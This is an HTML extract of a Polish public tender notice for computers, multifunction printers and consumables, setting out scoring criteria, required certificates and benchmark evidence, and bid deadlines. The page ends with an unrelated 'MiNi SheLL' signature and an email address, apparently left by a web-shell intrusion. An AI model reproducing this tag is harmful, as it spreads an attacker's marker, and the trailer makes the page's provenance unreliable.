Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą ilość (sumę) punktów w części II za kryteria: cena, okres świadczenia obsługi posprzedażowej oraz kryterium społeczne. Stanowić ona będzie końcową ocenę oferty.<br/><br/>Szczegółowy opis sposobu oceny ofert został określony w SWZ w pkt. 18</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres świadczenia obsługi posprzedażowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">3)	Kryterium społeczne (zatrudnienie do realizacji zamówienia osoby z niepełnosprawnościami)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowych, nienoszących śladów używania 5 sztuk zestawów składających się z: drukarki wielofunkcyjnej i materiałów eksploatacyjnych.<br/><br/>Zamawiający wymaga, aby:<br/>●	wszystkie zaoferowane drukarki wielofunkcyjne pochodziły od jednego producenta oraz były jednego modelu i w jednakowej konfiguracji sprzętowej,<br/>●	zaoferowane materiały eksploatacyjne, tj. moduły bębnów światłoczułych (o ile występują w zaoferowanym modelu drukarki wielofunkcyjnej) i tonery umożliwiły wydruk minimum 80000 stron przy 5% zaczernieniu zgodnie z normą ISO/IEC19752 wliczając w to materiały eksploatacyjne fabrycznie dostarczone z drukarką wielofunkcyjną przez producenta urządzenia,<br/>●	wszystkie zaoferowane bębny (o ile występują w zaoferowanym modelu drukarki wielofunkcyjnej) pochodziły od jednego producenta oraz były jednego modelu,<br/>●	wszystkie zaoferowane tonery pochodziły od jednego producenta oraz były jednego modelu.<br/><br/>Szczegółowy opis przedmiotu zamówienia został określony w SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 21777,48 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30230000-0 - Sprzęt związany z komputerami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30237000-9 - Części, akcesoria i wyroby do komputerów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Kryterium: cena – waga 60 pkt.<br/><br/>	Ocena punktowa wskazanego kryterium dokonana zostanie zgodnie z formułą:<br/><br/> Najniższa cena brutto spośród wszystkich ofert <br/>	------------------------------------------------------------------ x 60 <br/> Cena brutto badanej oferty<br/><br/>2)	Okres świadczenia obsługi posprzedażowej – waga: 40 pkt.<br/>Zamawiający będzie przyznawał punkty w następujący sposób:<br/>●	brak świadczenia obsługi posprzedażowej – 0 pkt.<br/>●	1 rok świadczenia obsługi posprzedażowej – 10 pkt.<br/>●	2 lata świadczenia obsługi posprzedażowej – 20 pkt.<br/>●	3 lata świadczenia obsługi posprzedażowej – 30 pkt.<br/>●	4 lata świadczenia obsługi posprzedażowej – 40 pkt.<br/><br/>W ramach kryteriów oceny ofert, oferta Wykonawcy może uzyskać łącznie maksimum 100 punktów. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą ilość (sumę) punktów w części III za kryteria: cena oraz okres świadczenia obsługi posprzedażowej. Stanowić ona będzie końcową ocenę oferty.<br/><br/>Szczegółowy opis sposobu oceny ofert został zawarty w SWZ w pkt. 18.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres świadczenia obsługi posprzedażowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykaz przedmiotowych środków dowodowych w części I :<br/><br/>1)	w zakresie potwierdzenia zgodności oferowanego sprzętu z wymaganiami technicznymi Zamawiającego: Specyfikacja techniczna oferowanego sprzętu - zał. Nr 2.I do SWZ.<br/>2)	w zakresie atrybutu wydajności obliczeniowej: <br/>- wydruk z bazy wyników dostępnej na stronie internetowej https://browser.geekbench.com potwierdzający, że oferowany model komputera w oferowanej konfiguracji umożliwia osiągniecie dla testów Geekbench 5 CPU Benchmark wyników:<br/>- Single-Core wynik minimum 950 punktów,<br/>- Multi-Core wynik minimum 3150 punktów;<br/>oraz <br/>- wydruk z bazy wyników dostępnej na stronie internetowej https://www.cpubenchmark.net/cpu_list.php. potwierdzający, że oferowany model komputera w oferowanej konfiguracji umożliwia osiągniecie dla testu PassMark wyniku:<br/>- CPU Mark wynik minimum 6000 punktów.<br/>3)	w zakresie zgodności z systemami operacyjnymi: Certyfikat poprawnej współpracy <br/>z oferowanym systemem operacyjnym (certyfikat producenta oprogramowania systemowego).<br/>4)	w zakresie niezawodność/jakość wytwarzania: <br/>a)	europejska deklaracja zgodności CE;<br/>b)	deklaracja spełnienia kryteriów środowiskowych z dyrektywą RoHS Unii Europejskiej;<br/>c)	Certyfikat ISO 9001 dla producenta komputera co najmniej w zakresie projektowania lub produkcji komputerów;<br/>d) wydruk ze strony internetowej www.epeat.net lub ze strony internetowej https://www.blauer-engel.de/en potwierdzający spełnianie wymogu, <br/>że oferowany komputer objęty jest certyfikatem EPEAT lub certyfikatem Blue Angle.<br/><br/>Wykaz przedmiotowych środków dowodowych w części II:<br/><br/>1)	w zakresie potwierdzenia zgodności oferowanego sprzętu z wymaganiami technicznymi Zamawiającego: Specyfikacja techniczna oferowanego sprzętu - zał. Nr 2.II do SWZ. <br/>2)	w zakresie atrybutu wydajności obliczeniowej: <br/>- wydruk z bazy wyników dostępnej na stronie internetowej https://browser.geekbench.com potwierdzający, że oferowany model komputera w oferowanej konfiguracji umożliwia osiągniecie dla testów Geekbench 5 CPU Benchmark wyników:<br/>- Single-Core wynik minimum 600 punktów,<br/>- Multi-Core wynik minimum 1800 punktów;<br/>oraz <br/>- wydruk z bazy wyników dostępnej na stronie internetowej https://www.cpubenchmark.net/cpu_list.php. potwierdzający, że oferowany model komputera w oferowanej konfiguracji umożliwia osiągniecie dla testu PassMark wyniku:<br/>- CPU Mark wynik minimum 5000 punktów.<br/>3)	w zakresie zgodności z systemami operacyjnymi: Certyfikat poprawnej współpracy <br/>z oferowanym systemem operacyjnym (certyfikat producenta oprogramowania systemowego).<br/>4)	w zakresie niezawodność/jakość wytwarzania: <br/>a)	europejska deklaracja zgodności CE;<br/>b)	deklaracja spełnienia kryteriów środowiskowych z dyrektywą RoHS Unii Europejskiej;<br/>c)	Certyfikat ISO 9001 dla producenta komputera co najmniej w zakresie projektowania lub produkcji komputerów;<br/>d) wydruk ze strony internetowej www.epeat.net lub ze strony internetowej https://www.blauer-engel.de/en potwierdzający spełnianie wymogu, <br/>że oferowany komputer objęty jest certyfikatem EPEAT lub certyfikatem Blue Angle. <br/><br/>Wykaz przedmiotowych środków dowodowych w części III:<br/><br/>1)	w zakresie potwierdzenia zgodności oferowanego sprzętu z wymaganiami technicznymi Zamawiającego: Specyfikacja techniczna oferowanego sprzętu - zał. Nr 2.III do SWZ. <br/>2)	w zakresie niezawodność/jakość wytwarzania: <br/>a)	europejska deklaracja zgodności CE;<br/>b)	deklaracja spełnienia kryteriów środowiskowych z dyrektywą RoHS Unii Europejskiej;<br/>c)	wydruk ze strony internetowej www.epeat.net lub ze strony internetowej https://www.blauer-engel.de/en potwierdzający spełnianie wymogu, <br/>że oferowany model drukarki objęty jest certyfikatem EPEAT lub certyfikatem Blue Angle. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty w części I:<br/>1)	w zakresie potwierdzenia zgodności oferowanego sprzętu z wymaganiami technicznymi Zamawiającego: Specyfikacja techniczna oferowanego sprzętu - zał. Nr 2.I do SWZ.<br/>2)	w zakresie atrybutu wydajności obliczeniowej: <br/>- wydruk z bazy wyników dostępnej na stronie internetowej https://browser.geekbench.com potwierdzający, że oferowany model komputera w oferowanej konfiguracji umożliwia osiągniecie dla testów Geekbench 5 CPU Benchmark wyników:<br/>- Single-Core wynik minimum 950 punktów,<br/>- Multi-Core wynik minimum 3150 punktów;<br/>oraz <br/>- wydruk z bazy wyników dostępnej na stronie internetowej https://www.cpubenchmark.net/cpu_list.php. potwierdzający, że oferowany model komputera w oferowanej konfiguracji umożliwia osiągniecie dla testu PassMark wyniku:<br/>- CPU Mark wynik minimum 6000 punktów.<br/>3)	w zakresie zgodności z systemami operacyjnymi: Certyfikat poprawnej współpracy <br/>z oferowanym systemem operacyjnym (certyfikat producenta oprogramowania systemowego).<br/>4)	w zakresie niezawodność/jakość wytwarzania: <br/>a)	europejska deklaracja zgodności CE;<br/>b)	deklaracja spełnienia kryteriów środowiskowych z dyrektywą RoHS Unii Europejskiej;<br/>c)	Certyfikat ISO 9001 dla producenta komputera co najmniej w zakresie projektowania lub produkcji komputerów;<br/>d) wydruk ze strony internetowej www.epeat.net lub ze strony internetowej https://www.blauer-engel.de/en potwierdzający spełnianie wymogu, <br/>że oferowany komputer objęty jest certyfikatem EPEAT lub certyfikatem Blue Angle.<br/><br/>Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty w części II:<br/>1)	w zakresie potwierdzenia zgodności oferowanego sprzętu z wymaganiami technicznymi Zamawiającego: Specyfikacja techniczna oferowanego sprzętu - zał. Nr 2.II do SWZ. <br/>2)	w zakresie atrybutu wydajności obliczeniowej: <br/>- wydruk z bazy wyników dostępnej na stronie internetowej https://browser.geekbench.com potwierdzający, że oferowany model komputera w oferowanej konfiguracji umożliwia osiągniecie dla testów Geekbench 5 CPU Benchmark wyników:<br/>- Single-Core wynik minimum 600 punktów,<br/>- Multi-Core wynik minimum 1800 punktów;<br/>oraz <br/>- wydruk z bazy wyników dostępnej na stronie internetowej https://www.cpubenchmark.net/cpu_list.php. potwierdzający, że oferowany model komputera w oferowanej konfiguracji umożliwia osiągniecie dla testu PassMark wyniku:<br/>- CPU Mark wynik minimum 5000 punktów.<br/>3)	w zakresie zgodności z systemami operacyjnymi: Certyfikat poprawnej współpracy <br/>z oferowanym systemem operacyjnym (certyfikat producenta oprogramowania systemowego).<br/>4)	w zakresie niezawodność/jakość wytwarzania: <br/>a)	europejska deklaracja zgodności CE;<br/>b)	deklaracja spełnienia kryteriów środowiskowych z dyrektywą RoHS Unii Europejskiej;<br/>c)	Certyfikat ISO 9001 dla producenta komputera co najmniej w zakresie projektowania lub produkcji komputerów;<br/>d) wydruk ze strony internetowej www.epeat.net lub ze strony internetowej https://www.blauer-engel.de/en potwierdzający spełnianie wymogu, <br/>że oferowany komputer objęty jest certyfikatem EPEAT lub certyfikatem Blue Angle. <br/><br/>Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty w części III:<br/>1)	w zakresie potwierdzenia zgodności oferowanego sprzętu z wymaganiami technicznymi Zamawiającego: Specyfikacja techniczna oferowanego sprzętu - zał. Nr 2.III do SWZ. <br/>2)	w zakresie niezawodność/jakość wytwarzania: <br/>a)	europejska deklaracja zgodności CE;<br/>b)	deklaracja spełnienia kryteriów środowiskowych z dyrektywą RoHS Unii Europejskiej;<br/>c)	wydruk ze strony internetowej www.epeat.net lub ze strony internetowej https://www.blauer-engel.de/en potwierdzający spełnianie wymogu, <br/>że oferowany model drukarki objęty jest certyfikatem EPEAT lub certyfikatem Blue Angle. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>2. W przypadku, o którym mowa w pkt. 1 Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 3. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem platformy: platformazakupowa.pl pod adresem: https://platformazakupowa.pl/transakcja/521435 w myśl Ustawy Pzp na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-03 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wyjaśnienie do pkt. 4.2.10: Pod pojęciem &#34;7 dni&#34; Zamawiający rozumiem 7 dni od dnia podpisania umowy, jednak nie później niż do dnia 23 grudnia 2021 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com